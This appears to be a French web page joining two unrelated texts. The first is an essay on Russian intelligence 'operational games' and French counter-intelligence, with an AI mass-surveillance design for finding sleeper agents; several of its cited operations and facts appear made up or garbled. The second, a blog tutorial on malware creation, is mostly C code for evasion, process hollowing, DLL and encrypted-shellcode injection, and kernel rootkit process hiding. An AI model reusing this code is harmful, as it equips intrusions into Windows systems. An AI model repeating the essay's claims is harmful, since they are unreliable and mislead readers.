- Conséquence : Cette loyauté inconditionnelle au régime explique leur résilience malgré les sanctions ou les échecs (ex. : guerre en Ukraine).
- Les « jeux opérationnels » (operativnye igry) : une doctrine unique
Définition et principes
Les operativnye igry (Оперативные игры) désignent des opérations de manipulation systématique où les agents russes jouent un rôle actif dans la désinformation, la provocation, et la manipulation des perceptions. Contrairement à l’Occident, où les agents doubles sont souvent utilisés de manière ponctuelle (ex. : contre-espionnage), les RIS en font une stratégie centrale.
Caractéristiques clés :
- Approche proactive : Les RIS ne se contentent pas de recruter des agents ou de collecter des informations. Ils créent des réalités alternatives en infiltrant, corrompant ou retournant des acteurs clés (politiques, militaires, médias).
- Exemple : L’affaire des Illegals (2010), où des agents russes vivaient sous couverture aux États-Unis pendant des années, ou l’influence sur les élections étrangères (ex. : ingérence dans l’élection américaine de 2016).
- Double jeu institutionnalisé : Les agents doubles ne sont pas une exception, mais une norme. Le SVR et le GRU forment leurs officiers à jouer sur plusieurs tableaux, même au sein de leurs propres rangs, pour tester la loyauté et déjouer les trahisons.
- Cas emblématique : Oleg Gordievsky (agent double du MI6 au KGB) a révélé que le KGB utilisait des « faux transfuges » pour intoxiquer les services occidentaux.
- Objectif ultime : Déstabiliser l’adversaire en semant la méfiance, en exploitant les divisions internes, et en créant des boucles de désinformation (ex. : théories du complot sur l’Ukraine ou l’OTAN).
- Techniques et tactiques distinctes
- Recrutement et gestion des agents
- Chantage et compromission (kompromat) : Les RIS privilégient la collecte de preuves compromettantes (sexuelles, financières, idéologiques) pour contrôler leurs cibles, plutôt que de miser sur l’idéalisme ou l’argent (comme le fait souvent la CIA).
- Exemple : L’affaire Trump-Russie, où des dossiers compromettants (Steele Dossier) ont été utilisés comme levier.
- Agents « dormants » : Des agents sont placés dans des positions clés (diplomatie, économie, médias) et activés des années plus tard.
- Exemple : Les réseaux d’influence russes en Europe, comme ceux révélés par le rapport Mitrokhin (archives du KGB).
- Désinformation et guerre cognitive
- Fabrication de narratifs : Les RIS excellent dans la création de fausses flag operations (opérations sous faux drapeau) pour discréditer leurs ennemis.
- Exemple : L’empoisonnement des Skripal en 2018, attribué à la Russie mais nié par Moscou, qui a proposé des contre-narratifs absurdes (ex. : théorie du « parfum empoisonné »).
- Exploitation des médias sociaux : Le GRU utilise des fermes à trolls (ex. : Internet Research Agency) pour amplifier les divisions politiques en Occident (ex. : mouvement Black Lives Matter ou QAnon).
- Résilience et adaptabilité
- Apprentissage des échecs : Contrairement aux services occidentaux, qui peuvent être paralysés par un scandale (ex. : affaire Snowden pour la NSA), les RIS intègrent leurs échecs dans leur doctrine. Un agent démasqué devient une opportunité pour lancer une nouvelle opération de désinformation.
- Exemple : Après l’expulsion de diplomates russes en 2018, le SVR a redoublé d’efforts pour recruter via des plateformes cryptées (Telegram, Signal).
- Pourquoi cette approche fonctionne-t-elle ?
- Culture du secret et de la paranoïa
- En Russie, la méfiance généralisée (héritée du KGB) rend les jeux opérationnels efficaces. Les agents sont formés pour anticiper la trahison et utiliser la psychologie humaine (peur, cupidité, idéologie) comme levier.
- Citation de Poutine : « Il n’y a pas d’anciens officiers du KGB. » → La loyauté est permanente, même après la retraite.
- Asymétrie avec l’Occident
- Les démocraties ont des freins éthiques et juridiques (ex. : interdiction de la torture, transparence relative). Les RIS n’ont pas ces contraintes et exploitent ces faiblesses.
- Exemple : La Russie utilise des mercenaires (groupe Wagner) pour des opérations plausiblement niables, tandis que l’Occident hésite à externaliser ses sales besognes.
- Patiente stratégique
- Les RIS jouent sur le long terme. Une opération peut prendre 10 ans avant de porter ses fruits (ex. : infiltration des partis d’extrême droite européens).
- Implications pour les services occidentaux
- Nécessité d’une nouvelle doctrine
- Comprendre la mentalité russe : Les analystes occidentaux doivent cesser de projeter leurs valeurs (transparence, règles) sur les RIS. La logique russe est celle de la survie du régime, pas de la « victoire » au sens classique.
- Former des contre-experts : Créer des unités spécialisées dans la détection des jeux opérationnels (ex. : cellule StratCom de l’OTAN).
- Renforcer la résilience
- Protéger les institutions : Limiter l’accès des agents russes aux postes sensibles (ex. : lois contre l’ingérence étrangère, comme le Foreign Agents Registration Act aux États-Unis).
- Lutter contre la désinformation : Investir dans l’éducation aux médias et la cybersécurité pour contrer les campagnes hybrides.
- Éviter les pièges
- Ne pas sous-estimer la capacité d’adaptation des RIS. Chaque expulsion de diplomates ou sanction est une opportunité pour eux de changer de tactique.
- Étude de cas : l’Ukraine (2014–2026)
- Jeux opérationnels en action :
- 2014 : Utilisation de « petits hommes verts » (soldats sans insigne) en Crimée pour créer un flou juridique.
- 2022–2026 : Campagnes de désinformation sur les « laboratoires biologiques américains » en Ukraine, ou l’accusation de « nazisme » pour justifier l’invasion.
- Agent double emblématique : Oleg Smolenkov (ex-SVR), qui aurait aidé la CIA à comprendre les operativnye igry avant de disparaître en 2017.
Conclusion : un langage, deux grammaires
Les services de renseignement partagent un langage commun (techniques d’espionnage), mais les RIS en ont développé une grammaire propre, où la fin (la survie du régime) justifie tous les moyens. Pour les contrer, l’Occident doit :
- Adopter une pensée asymétrique : Ne pas jouer selon leurs règles, mais anticiper leurs coups.
- Renforcer la coopération interservices : Partager les renseignements sur les tactiques russes (ex. : base de données commune sur les agents dormants).
- Investir dans la guerre cognitive : Former des experts capables de déconstruire les narratifs russes.
- Comprendre les vulnérabilités françaises ciblées par les RIS
- Les RIS exploitent systématiquement les faiblesses structurelles de la France, qu’elles soient politiques, économiques, ou sociétales.
- Cibles prioritaires des RIS en France
| Domaine |
Exemples d’actions russes |
Risque pour la France |
| Politique |
Financement occulté de partis extrêmes |
Déstabilisation démocratique |
| Énergie |
Cyberattaques sur EDF, TotalEnergies |
Dépendance énergétique, chantage |
| Défense |
Espionnage industriel (Dassault, Naval Group) |
Perte d’avantage technologique |
| Médias & Réseaux |
Propagation de fake news (RT France, Sputnik) |
Polarisation sociale, affaiblissement de l’OTAN |
| Diplomatie |
Infiltration d’ambassades, ONG pro-russes |
Influence sur la politique étrangère |
| Cybersécurité |
Attaques contre l’ANSSI, ministères |
Vol de données sensibles, sabotage |
| Diaspora russe |
Recrutement d’agents via les oligarques |
Pressions sur les décideurs |
Exemple concret : En 2022, la DGSE a déjoué une tentative d’infiltration d’un réseau d’influence russe au sein du Rassemblement National, via des financements opaques et des promesses de soutien médiatique (source : rapport Sénat 2023).
- Leçons pour la DGSE : adapter la doctrine
- Renforcer le contre-espionnage « à la russe »
- Créer une unité dédiée aux operativnye igry :
- Former des analystes spécialisés dans la détection des agents dormants et des opérations de double jeu.
- Exemple : Le Royaume-Uni a créé le National Protective Security Authority (NPSA) pour contrer les ingérences hybrides. La France pourrait s’en inspirer.
- Développer des « leurres contrôlés » :
- La DGSE pourrait simuler des fuites d’informations pour identifier les agents russes en France (technique utilisée par le Mossad).
- Cas d’école : L’opération Hamilcar (années 1980), où la DGSE a retourné un agent du KGB en lui faisant croire à une taupe française au Kremlin.
- Moderniser la lutte contre la désinformation
- Collaboration avec l’ANSSI et les plateformes numériques :
- Obliger les réseaux sociaux à signalement proactif des comptes liés à l’Internet Research Agency (ferme à trolls russe).
- Outils : Utiliser l’IA pour détecter les schémas de désinformation (ex. : répétition de narratifs pro-russes sur l’Ukraine).
- Cellule de contre-désinformation interministérielle :
- Associer DGSE, DGSI, et Viginum (service anti-fake news) pour une réponse coordonnée.
- Exemple : La Lituanie a créé un Centre d’excellence pour la communication stratégique (StratCom) de l’OTAN.
- Protéger les secteurs stratégiques
- Contrôle renforcé des investissements étrangers :
- Élargir le périmètre de soumission à autorisation pour les secteurs sensibles (énergie, télécoms, défense), comme le fait le CFIUS aux États-Unis.
- Exemple : En 2021, la France a bloqué l’acquisition d’une entreprise de cybersécurité par un fonds russe.
- Audit des infrastructures critiques :
- Vérifier les sous-traitants des centrales nucléaires, ports, et réseaux 5G (risque d’infiltration via des sociétés écrans).
- Renforcer la résilience sociétale
- Sensibilisation des élites et des médias
- Formations obligatoires pour les hauts fonctionnaires, militaires, et journalistes sur :
- Les techniques de recrutement par kompromat.
- La détection des fausses identités (ex. : diplomates russes sous couverture).
- Campagnes grand public :
- Expliquer les méthodes russes (ex. : documentaires, modules scolaires), comme le fait la Suède avec son programme Totalförsvar (défense totale).
- Lutte contre l’ingérence via les diasporas
- Surveillance discrète des réseaux pro-russes :
- Cibler les associations culturelles, églises orthodoxes, et oligarques installés en France (ex. : Viktor Vekselberg, proche de Poutine, possèdait des actifs en France).
- Outils juridiques : Utiliser la loi Sapin 2 contre la corruption et le blanchiment.
- Coopération européenne et atlantique
- Partager le renseignement en temps réel
- Intégrer pleinement le European Intelligence Analysis Centre (INTCEN) :
- Échanger des indicateurs de compromise (IOC) avec l’Allemagne, les Pays-Bas, et les pays baltes (cibles majeures des RIS).
- Renforcer le lien avec la CIA et le MI6 :
- Exemple : L’opération Allied Harbor (2018), où la DGSE a collaboré avec la CIA pour expulser des espions russes en Europe.
- Sanctions ciblées et diplomatie offensive
- Liste noire européenne des agents russes :
- Étendre les sanctions à leurs famille et réseaux financiers (comme le fait l’UE depuis 2022).
- Expulsions coordonnées :
- Répliquer aux expulsions massives de diplomates russes (ex. : 40 expulsions en 2018 après l’affaire Skripal).
- Innovations technologiques et juridiques
- Cybersécurité : anticiper les attaques hybrides
- DGSE + ANSSI :
- Développer des cyber-pièges (honeypots) pour attirer et identifier les hackers du GRU (ex. : unité Bureau 12 de la DGSE).
- Exemple : En 2020, la France a attribué la cyberattaque contre l’hôpital de Villefranche au groupe APT29 (lié au SVR).
- Cadre juridique adapté
- Loi sur l’ingérence étrangère :
- Inspiré du Foreign Agents Registration Act (FARA) américain, obligera les lobbyistes pro-russes à se déclarer.
- Projet en cours : La proposition de loi LOPMI (2024) va dans ce sens.
- Protection des lanceurs d’alerte :
- Créer un statut européen pour les transfuges russes (ex. : Maksim Shugaley, agent du GRU arrêté en Libye en 2019).
- Étude de cas : l’affaire Benalla et les leçons non tirées
- Contexte : En 2018, Alexandre Benalla, collaborateur d’Emmanuel Macron, a été lié à des négociations avec des oligarques russes (via des intermédiaires).
- Erreurs françaises :
- Manque de vigilance sur les conflits d’intérêts.
- Absence de vérification approfondie des contacts étrangers de l’Élysée.
- Leçon :
- Audit systématique des entourages présidentiels et ministériels par la DGSI.
- Recommandations concrètes pour la France
| Priorité |
Action |
Acteur responsable |
| Contre-espionnage |
Créer une task force anti-operativnye igry |
DGSE + DGSI |
| Cybersécurité |
Déployer des honeypots dans les ministères |
ANSSI + DGSE |
| Désinformation |
Lancer une plateforme de fact-checking |
Viginum + médias publics |
| Diplomatie |
Expulser les diplomates russes suspects |
Quai d’Orsay |
| Économie |
Auditer les investissements russes |
Trésor public + DGSE |
| Société |
Former les élus locaux aux risques d’ingérence |
Préfectures + ANSSI |
- Pièges à éviter
- Sous-estimer la patience russe : Les RIS préparent leurs opérations sur 10–15 ans (ex. : infiltration de l’extrême droite française depuis les années 2000).
- Négliger les alliances improbables : La Russie collabore avec la Chine et l’Iran pour des opérations conjointes (ex. : cyberattaques, désinformation).
- Réagir de manière prévisible : Les expulsions de diplomates doivent être coordonnées avec l’UE pour éviter les représailles ciblées.
Conclusion : une approche globale et proactive
La France doit combiner :
- Renseignement offensif (infiltration des réseaux russes).
- Protection des infrastructures (énergie, défense, numérique).
- Résilience sociétale (éducation, transparence).
- Coopération internationale (UE, OTAN).
L’utilisation de l’intelligence artificielle (IA) par la DGSE pour détecter les agents dormants russes (ou d’autres services étrangers) représente une opportunité majeure, mais aussi un défi technique et éthique. Voici une analyse structurée des méthodes, outils et limites d’une telle approche, adaptée au contexte français et aux spécificités des operativnye igry russes.
- Définition : Qu’est-ce qu’un agent dormant ?
Un agent dormant est un individu recruté et formé par un service de renseignement étranger, mais inactif pendant des années, voire des décennies, jusqu’à son activation. Il peut être :
- Un citoyen français (recruté via chantage, idéologie ou argent).
- Un diplomate, homme d’affaires ou étudiant sous couverture.
- Un membre d’une diaspora ou d’un réseau d’influence.
Exemple russe : Les Illegals du SVR (comme Anna Chapman, démasquée en 2010) vivaient aux États-Unis sous de fausses identités pendant des années.
- Comment l’IA peut aider la DGSE ?
- Analyse des données massives (Big Data)
L’IA excelle dans le traitement de volumes colossaux de données pour identifier des anomalies ou des schémas suspects.
Sources de données exploitables :
| Type de données |
Exemples concrets |
Utilité pour la détection |
| Communications |
E-mails, SMS, appels (métadonnées) |
Détection de contacts répétés avec des diplomates russes |
| Réseaux sociaux |
Profils LinkedIn, Facebook, Telegram |
Identification de comptes « fantômes » ou de comportements atypiques |
| Transactions financières |
Virements, cryptomonnaies, dons |
Repérage de financements opaques (ex. : oligarques russes) |
| Déplacements |
Données GPS, billets d’avion, péages |
Voyages fréquents en Russie ou dans des zones à risque |
| Biométrie |
Reconnaissance faciale, voix |
Correspondance avec des bases de données russes (ex. : FSB) |
| Activité en ligne |
Historique de navigation, recherches web |
Intérêt soudain pour des sujets sensibles (ex. : défense, énergie) |
Cas pratique : En 2020, le MI5 britannique a utilisé l’IA pour croiser des données de téléphonie et de voyages, ce qui a permis de démasquer un réseau d’agents dormants du GRU.
- Techniques d’IA applicables
- Apprentissage supervisé (Supervised Learning)
- Principe : L’IA est entraînée sur des jeux de données labellisés (ex. : profils connus d’agents russes vs. citoyens ordinaires).
- Applications :
- Classification des comportements : L’IA identifie des signaux faibles (ex. : un cadre français qui communique régulièrement avec une ambassade russe, sans raison professionnelle).
- Détection de langages codés : Analyse sémantique des échanges pour repérer des mots-clés ou des phrases types utilisés par les services russes.
- Apprentissage non supervisé (Unsupervised Learning)
- Principe : L’IA recherche des anomalies dans des datasets non étiquetés.
- Applications :
- Clustering : Regroupement d’individus aux profiles similaires (ex. : plusieurs personnes sans lien apparent, mais qui voyagent aux mêmes dates en Russie).
- Détection de réseaux cachés : Cartographie des connexions indirectes (ex. : un universitaire français en contact avec un oligarque russe via une ONG).
- Traitement automatique du langage (NLP)
- Principe : Analyse des textes (e-mails, posts sur les réseaux) pour détecter des incohérences ou des narratifs pro-russes.
- Applications :
- Détection de propagande ou de désinformation (ex. : reprise systématique de thèmes du Kremlin).
- Identification de fausses identités (ex. : un profil LinkedIn créé il y a 2 ans, mais avec une histoire professionnelle invérifiable).
- Analyse des réseaux (Graph Analytics)
- Principe : Modélisation des relations entre individus (réseaux sociaux, transactions).
- Applications :
- Visualisation des liens faibles (ex. : un fonctionnaire français et un diplomate russe ont le même contact à Moscou).
- Détection de communautés suspectes (ex. : un groupe de lobbyistes pro-russes en contact avec des militaires).
- Reconnaissance biométrique
- Principe : Comparaison de visages ou de voix avec des bases de données russes.
- Applications :
- Vérification si un « étudiant russe » en France correspond à un agent connu du SVR (via des bases comme Frontex ou Interpol).
- Outils concrets pour la DGSE
| Outil/Technologie |
Description |
Exemple d’utilisation |
| Palantir Gotham |
Plateforme d’analyse de données utilisée par la CIA et le FBI. |
Croisement de données bancaires et de voyages. |
| i2 Analyst’s Notebook |
Logiciel d’IBM pour l’analyse de réseaux. |
Cartographie des liens entre des personnes. |
| Maltego |
Outil d’OSINT (Open Source Intelligence) pour enquêtes numériques. |
Investigation sur les réseaux sociaux. |
| AI de reconnaissance faciale |
Comme Clearview AI (controversé, mais efficace). |
Identification d’un agent sous faux nom. |
| Deep Learning (CNN, RNN) |
Réseaux de neurones pour analyser images et textes. |
Détection de faux documents (passeports). |
Exemple français : La DGSE utilise déjà des outils similaires pour la lutte antiterroriste. Une adaptation pour le contre-espionnage est envisageable, avec des algorithmes spécifiques aux méthodes russes.
- Étapes pour mettre en place un système IA anti-agents dormants
Étape 1 : Collecte et centralisation des données
- Sources :
- ANSSI (cyber).
- Douanes (voyages).
- Banques (transactions).
- Réseaux sociaux (via des partenariats légaux).
- Cadre juridique :
- Utiliser la loi renseignement (2015) et le RGPD (avec dérogations pour la sécurité nationale).
Étape 2 : Entraînement de l’IA
- Jeux de données :
- Profils d’agents russes déjà démasqués (ex. : affaires passées).
- Données synthétiques pour simuler des scénarios.
- Collaboration :
- Partenariat avec le CEA ou Inria pour développer des algorithmes sur mesure.
Étape 3 : Détection et alerte
- Seuils d’alerte :
- Un individu avec 3 signaux faibles (ex. : voyage en Russie + contact avec un diplomate + intérêt pour la défense) déclenche une enquête humaine.
- Validation par des analystes :
- L’IA ne remplace pas le jugement humain, mais priorise les cibles.
Étape 4 : Action
- Surveillance discrète (filature, écoutes légales).
- Recrutement en tant qu’agent double (si possible).
- Neutralisation (expulsion, arrestation).
- Limites et risques
- Faux positifs et biais
- Risque : L’IA peut stigmatiser des innocents (ex. : un universitaire étudiant la Russie).
- Solution :
- Audit régulier des algorithmes par des experts indépendants.
- Transparence partielle (ex. : expliquer à un suspect pourquoi il est surveillé).
- Contournement par les RIS
- Les agents russes adaptent leurs méthodes :
- Utilisation de messageries chiffrées (Signal, Telegram).
- Fausses pistes (ex. : créer des profils « leurres » pour saturer l’IA).
- Solution :
- Mettre à jour en continu les modèles d’IA avec les dernières tactiques russes.
- Enjeux éthiques et juridiques
- Vie privée : La surveillance de masse est illégale en France sans motif valable.
- Solution :
- Cibler uniquement les personnes à risque (ex. : hauts fonctionnaires, militaires).
- Contrôle parlementaire (via la Délégation parlementaire au renseignement).
- Exemple concret : un scénario d’utilisation
Cas : Un ingénieur de Naval Group (spécialisé dans les sous-marins) est repéré par l’IA parce que :
- Il a voyagé 5 fois à Saint-Pétersbourg en 2 ans (sans raison professionnelle).
- Son compte LinkedIn a été « liké » par un attaché militaire russe.
- Il a recherché des articles sur les systèmes de propulsion nucléaire.
- Il a reçu un virement de 5 000 € d’une société offshore.
Processus :
- L’IA signale le profil à la DGSE.
- Une équipe vérifie manuellement les données.
- Si confirmation, surveillance rapprochée ou interpellation.
- Comparaison internationale
| Pays |
Outil/Stratégie IA |
Résultats |
| USA |
PRISM (NSA) + IA |
Détection de plusieurs agents russes. |
| Royaume-Uni |
GCHQ + Palantir |
Démantèlement de réseaux du GRU. |
| Israël |
Unit 8200 (armée) |
Leader en cyber-défense et détection. |
| France |
DGSE + ANSSI (en développement) |
Potentiel élevé, mais retard à combler. |
- Recommandations pour la DGSE
- Investir dans des partenariats tech :
- Collaborer avec Thales, Atos, ou des startups françaises (ex. : Dataiku).
- Former des data scientists :
- Créer une unité dédiée au sein de la DGSE, mixant experts en IA et anciens agents.
- Coopérer avec l’UE :
- Partager des bases de données avec l’Allemagne et les Pays-Bas (cibles majeures des RIS).
- Anticiper l’évolution des menaces :
- Intégrer l’analyse des deepfakes et des bots sur les réseaux sociaux.
- Conclusion : l’IA comme multiplicateur de force
L’IA ne remplacera pas le travail humain de la DGSE, mais elle peut : ✅ Automatiser la détection des signaux faibles. ✅ Réduire le temps d’enquête de plusieurs mois à quelques jours. ✅ Identifier des réseaux invisibles aux méthodes traditionnelles.
Prochaine étape : La France pourrait lancer un projet pilote sur un secteur critique (ex. : énergie ou défense), en s’inspirant du modèle israélien (Unit 8200).
par Aics-sr | Fév 10, 2026 | Moments d'histoire

L’Art de la Création de Malware ( fourni à des fins éducatives et de recherche en sécurité offensive)
Techniques Avancées d’Évasion et d’Injection
Décortiquer les mécanismes utilisés par les acteurs malveillants pour détourner l’exécution du code, échapper aux détections et s’implanter profondément dans les systèmes Windows.
Nous aborderons des concepts allant de la manipulation bas-niveau des structures système (comme le PEB) aux techniques d’injection de shellcode chiffré, en passant par l’émulation de tactiques attribuées à des groupes APT (Advanced Persistent Threat) tels qu’APT28, APT29 et APT33.
Note importante : Ce contenu est fourni à des fins éducatives et de recherche en sécurité offensive. La compréhension de ces techniques est essentielle pour développer des défenses robustes.

- Les Fondamentaux : Windows API et Liaison Dynamique
L’API Windows (WinAPI) est l’interface fondamentale permettant aux programmes d’interagir avec le système d’exploitation. Pour un développeur de malware, la manière dont les fonctions sont chargées peut faire la différence entre la détection et la furtivité.
Liaison Statique vs Dynamique
- Liaison statique : Le code de la fonction est intégré directement dans l’exécutable.
int main(void) {
MessageBoxA(0, “Foo Here.”, “Info”, 0);
return 0;
}
- Problème : Facilement détectable par les outils de sécurité.
- Liaison dynamique : La fonction est chargée à l’exécution depuis une DLL.
int main(void) {
size_t get_MessageBoxA = (size_t)GetProcAddress(LoadLibraryA(”USER32.dll”), “MessageBoxA”);
def_MessageBoxA msgbox_a = (def_MessageBoxA)get_MessageBoxA;
msgbox_a(0, “Foo Here.”, “Info”, 0);
return 0;
}
Avantage : Réduit la signature statique et permet une résolution d’API à la volée.
- Accès au PEB (Process Environment Block)
Le PEB est une structure de données critique contenant des informations sur le processus en cours d’exécution. Il est accessible en mode utilisateur et permet de récupérer les adresses de base des modules chargés (DLL).
Localisation du PEB
- x86 : fs:[0x30]
- x64 : gs:[0x60]
Exemple : Récupération de l’adresse de base d’une DLL
size_t GetModHandle(wchar_t *libName) {
PEB32 *pPEB = (PEB32 *)__readfsdword(0x30);
PLIST_ENTRY header = &(pPEB->Ldr->InMemoryOrderModuleList);
for (PLIST_ENTRY curr = header->Flink; curr != header; curr = curr->Flink) {
LDR_DATA_TABLE_ENTRY32 *data = CONTAINING_RECORD(curr, LDR_DATA_TABLE_ENTRY32, InMemoryOrderLinks);
if (StrStrIW(libName, data->BaseDllName.Buffer))
return data->DllBase;
}
return 0;
}
Cette fonction parcourt la liste des modules chargés pour trouver kernel32.dll et récupérer son adresse de base.
- Résolution Dynamique d’API via les Tables d’Export
Une fois le module de base obtenu, on peut parser sa table d’export pour localiser l’adresse d’une fonction spécifique.
size_t GetFuncAddr(size_t moduleBase, char* szFuncName) {
// Parsing des en-têtes PE
PIMAGE_DOS_HEADER dosHdr = (PIMAGE_DOS_HEADER)(moduleBase);
PIMAGE_NT_HEADERS ntHdr = (PIMAGE_NT_HEADERS)(moduleBase + dosHdr->e_lfanew);
IMAGE_DATA_DIRECTORY dataDir_exportDir = ntHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
// Accès à la table d’export
PIMAGE_EXPORT_DIRECTORY exportTable = (PIMAGE_EXPORT_DIRECTORY)(moduleBase + dataDir_exportDir.VirtualAddress);
DWORD* arrFuncs = (DWORD *)(moduleBase + exportTable->AddressOfFunctions);
DWORD* arrNames = (DWORD *)(moduleBase + exportTable->AddressOfNames);
WORD* arrNameOrds = (WORD *)(moduleBase + exportTable->AddressOfNameOrdinals);
// Recherche de la fonction par nom
for (size_t i = 0; i < exportTable->NumberOfNames; i++) {
char* sz_CurrApiName = (char *)(moduleBase + arrNames[i]);
if (!stricmp(sz_CurrApiName, szFuncName)) {
WORD num_CurrApiOrdinal = arrNameOrds[i] + 1;
return moduleBase + arrFuncs[num_CurrApiOrdinal – 1];
}
}
return 0;
}
Cette technique permet d’appeler des API comme WinExec de manière totalement dynamique, sans import statique.
int main() {
size_t kernelBase = GetModHandle(L”kernel32.dll”);
size_t ptr_WinExec = GetFuncAddr(kernelBase, “WinExec”);
((UINT(WINAPI*)(LPCSTR, UINT))ptr_WinExec)(”calc”, SW_SHOW);
return 0;
}
- IAT Hooking – Détournement de la Table d’Import
L’IAT (Import Address Table) contient les adresses des fonctions importées par un module. En hookant l’IAT, on peut intercepter et modifier les appels d’API.
void iatHook(char *module, const char *szHook_ApiName, size_t callback, size_t &apiAddr) {
auto dir_ImportTable = getNtHdr(module)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
auto impModuleList = (IMAGE_IMPORT_DESCRIPTOR *)&module[dir_ImportTable.VirtualAddress];
for (; impModuleList->Name; impModuleList++) {
auto arr_callVia = (IMAGE_THUNK_DATA *)&module[impModuleList->FirstThunk];
auto arr_apiNames = (IMAGE_THUNK_DATA *)&module[impModuleList->OriginalFirstThunk];
for (int i = 0; arr_apiNames[i].u1.Function; i++) {
auto curr_impApi = (PIMAGE_IMPORT_BY_NAME)&module[arr_apiNames[i].u1.Function];
if (!strcmp(szHook_ApiName, (char *)curr_impApi->Name)) {
apiAddr = arr_callVia[i].u1.Function;
arr_callVia[i].u1.Function = callback; // Remplacement de l’adresse
break;
}
}
}
}
Utilisation : Hook de MessageBoxA pour modifier son comportement.
- Process Hollowing – Remplacement de Processus Légitimes
Cette technique consiste à créer un processus légitime en état suspendu, puis à remplacer son code et ses données par une charge malveillante.
Étapes clés :
- Création du processus suspendu avec CreateProcessA et le flag CREATE_SUSPENDED.
- Allocation de mémoire dans le processus cible via VirtualAllocEx.
- Écriture des en-têtes PE et des sections dans la mémoire allouée avec WriteProcessMemory.
- Mise à jour du contexte du thread (registre EAX) pour pointer vers le point d’entrée du nouveau code.
- Reprise de l’exécution avec ResumeThread.
// Création du processus suspendu
CreateProcessA(path, 0, 0, 0, false, CREATE_SUSPENDED, 0, 0, &SI, &PI);
// Injection du code malveillant
WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
for (int i = 0; i < NtHeader->FileHeader.NumberOfSections; i++)
WriteProcessMemory(PI.hProcess, LPVOID((size_t)pImageBase + SectionHeader[i].VirtualAddress),
LPVOID((size_t)Image + SectionHeader[i].PointerToRawData),
SectionHeader[i].SizeOfRawData, 0);
// Modification du contexte et reprise
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, LPCONTEXT(CTX));
ResumeThread(PI.hThread);
Cas réel : Cette méthode est similaire à celle utilisée par X-Agent (APT28/Fancy Bear).
- Techniques d’Injection de DLL
L’injection de DLL permet d’introduire du code dans un processus cible. Plusieurs méthodes existent :
- Via LoadLibraryA
- Alloue de la mémoire pour le chemin de la DLL.
- Utilise CreateRemoteThread pour appeler LoadLibraryA avec ce chemin.
WriteProcessMemory(hHandle, dllPathAddr, dllPath, strlen(dllPath), NULL);
CreateRemoteThread(hHandle, NULL, 0, (LPTHREAD_START_ROUTINE)loadLibAddr, dllPathAddr, 0, NULL);
- Via NtCreateThreadEx (API non documentée)
- Plus furtif, évite les détections basées sur CreateRemoteThread.
- Nécessite la résolution dynamique de NtCreateThreadEx depuis ntdll.dll.
- Injection de Shellcode et Évasion
Le shellcode est du code machine autonome, souvent utilisé pour des exécutions directes en mémoire.
Exemple : Injection de shellcode chiffré AES (Technique Early Bird – APT33)
int AESDecrypt(unsigned char* payload, DWORD payload_len, char* key, size_t keylen) {
HCRYPTPROV hProv; HCRYPTHASH hHash; HCRYPTKEY hKey;
CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT);
CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash);
CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0);
CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey);
CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, payload, &payload_len);
// Nettoyage
CryptDestroyKey(hKey); CryptDestroyHash(hHash); CryptReleaseContext(hProv, 0);
return 0;
}
Processus :
- Création d’un processus suspendu (svchost.exe).
- Déchiffrement du shellcode en mémoire.
- Allocation et écriture du shellcode dans le processus cible.
- Exécution via QueueUserAPC pour une injection furtive.
- Développement d’un Rootkit en Mode Kernel
Un rootkit opère au niveau le plus bas du système pour masquer sa présence.
- Driver Entry Point
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath) {
DbgPrint(”Hello World!”);
return STATUS_SUCCESS;
}
- Dissimulation de Processus via DKOM (Direct Kernel Object Manipulation)
NTSTATUS HideProcess(ULONG pid) {
PEPROCESS currentEProcess = PsGetCurrentProcess();
LIST_ENTRY* currentList = ¤tEProcess->ActiveProcessLinks;
// Parcours de la liste des processus
// Suppression du processus cible de la liste chaînée
blink->Flink = flink;
flink->Blink = blink;
return STATUS_SUCCESS;
}
Cette technique manipule la structure EPROCESS pour rendre un processus invisible aux outils système.
- Injection de DLL en Mode Kernel
- Utilisation de PsSetLoadImageNotifyRoutine pour surveiller le chargement de kernel32.dll.
- Injection via APC (Asynchronous Procedure Call) pour exécuter du code dans un thread cible.
Conclusion : L’Évolution Continue des Techniques Malveillantes
Nous avons parcouru un large éventail de techniques, de la manipulation basique d’API à la création de rootkits kernel. Chaque méthode présente des avantages et des limitations, et leur efficacité dépend du contexte d’utilisation et des mesures de défense en place.
Rappel : Ces connaissances doivent servir à renforcer la cybersécurité, non à nuire. La compréhension offensive est un pilier essentiel de la défense proactive.